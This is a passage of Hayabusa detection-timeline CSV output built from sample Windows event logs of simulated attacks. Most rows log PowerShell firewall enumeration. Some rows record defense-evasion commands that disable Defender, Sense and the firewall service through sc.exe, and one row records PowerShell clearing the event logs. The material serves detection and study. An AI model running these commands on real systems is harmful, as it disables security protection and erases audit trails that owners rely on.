details.""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.489 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.223 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.239 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$this.PSBase.CimInstanceProperties[""DisplayName""].Value",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) ; $this.PSBase.CimInstanceProperties[""DisplayName""].Value = $x ; $this.PSBase.CimInstanceProperties[""ElementName""].Value = $x",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profiles'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profiles'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]($this.PSBase.CimInstanceProperties['Direction'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Direction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['Action'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Action'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]($this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]($this.PSBase.CimInstanceProperties['PrimaryStatus'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PrimaryStatus'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$this.PSBase.CimInstanceProperties[""Status""].Value + "" ("" + ($this.PSBase.CimInstanceProperties[""StatusCode""].Value + 0) + "")""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Microsoft.Windows.Firewall.Commands.Formatting.Formatter]::FormatEnforcementStatus($this.PSBase.CimInstanceProperties[""EnforcementStatus""].Value)",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]($this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:08.317 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PolicyStoreSourceType'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:12.926 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayName""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Description""; value="""" ParameterBinding(Get-NetFirewallRule): name=""DisplayGroup""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Group""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Enabled""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Direction""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Action""; value="""" ParameterBinding(Get-NetFirewallRule): name=""EdgeTraversalPolicy""; value="""" ParameterBinding(Get-NetFirewallRule): name=""LooseSourceMapping""; value="""" ParameterBinding(Get-NetFirewallRule): name=""LocalOnlyMapping""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Owner""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PrimaryStatus""; value="""" ParameterBinding(Get-NetFirewallRule): name=""Status""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSource""; value="""" ParameterBinding(Get-NetFirewallRule): name=""PolicyStoreSourceType""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallAddressFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallApplicationFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallInterfaceTypeFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallPortFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallSecurityFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallServiceFilter""; value="""" ParameterBinding(Get-NetFirewallRule): name=""AssociatedNetFirewallProfile""; value="""" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False"" TerminatingError(): ""The pipeline has been stopped.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:12.926 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallSetting,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]($this.PSBase.CimInstanceProperties['Exemptions'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Exemptions'].Value = [System.Uint32][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulFtp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStatefulPptp'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profile'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profile'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['RequireFullAuthSupport'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]($this.PSBase.CimInstanceProperties['CertValidationLevel'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['CertValidationLevel'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]($this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowIPsecThroughNAT'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().Equals(""0"")) { ""NotConfigured""; } else { $x.Value }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = 0; } else { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = [uint32]$x; }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]($this.PSBase.CimInstanceProperties['KeyEncoding'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['KeyEncoding'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]($this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallSetting): ""Get-NetFirewallSetting"" ParameterBinding(Get-NetFirewallSetting): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallSetting): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallSetting): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetSecuritySettingData (InstanceID = ""MSFT?GlobalIPSecSettingData"")""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:57:04.361 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config sense start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0xe58 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-25 07:57:05.977 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config mpssvc start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2ebc | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-25 07:57:08.463 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config WinDefend start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2e40 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-25 18:04:24.089 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Clear-EventLog -LogName application, system -confirm",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-25 18:04:30.334 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:04:30.334 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Clear-EventLog): ""Clear-EventLog"" ParameterBinding(Clear-EventLog): name=""LogName""; value=""application, system"" 